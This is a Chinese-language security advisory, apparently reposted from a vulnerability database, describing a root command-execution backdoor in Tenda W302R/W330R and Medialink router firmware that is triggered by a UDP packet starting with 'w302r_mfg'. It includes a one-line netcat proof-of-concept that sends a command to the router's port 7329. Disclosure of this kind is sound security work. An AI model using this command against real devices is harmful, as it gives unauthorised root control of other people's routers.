admin管理员组文章数量:1560320
发布日期:2013-10-15
更新日期:2013-10-19
受影响系统:
tenda W302R
tenda W330R
描述:
--------------------------------------------------------------------------------
Tenda是深圳的一家网络设备提供商。
Tenda的 W330R、W302R无线路由器固件最新版本及Medialink MWN-WAPR150N中存在后门,该漏洞通过一个UDP数据包即可利用,如果设备收到以字符串 “w302r_mfg”为开头的数据包,即可触发此漏洞执行各类命令,甚至以root权限执行任何命令。此后门可通过LAN及启用了WPS的WLAN加以利用,无法从WAN上利用。
链接:http://www.devttys0/2013/10/from-china-with-love/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Craig(http://www.devttys0/2013/10/from-china-with-love/)提供了如下测试方法:
echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329
建议:
--------------------------------------------------------------------------------
厂商补丁:
tenda
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
版权声明:本文标题:腾达路由器linux开发,Tenda无线路由器远程命令执行后门漏洞 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/xitong/1727431697a1114178.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论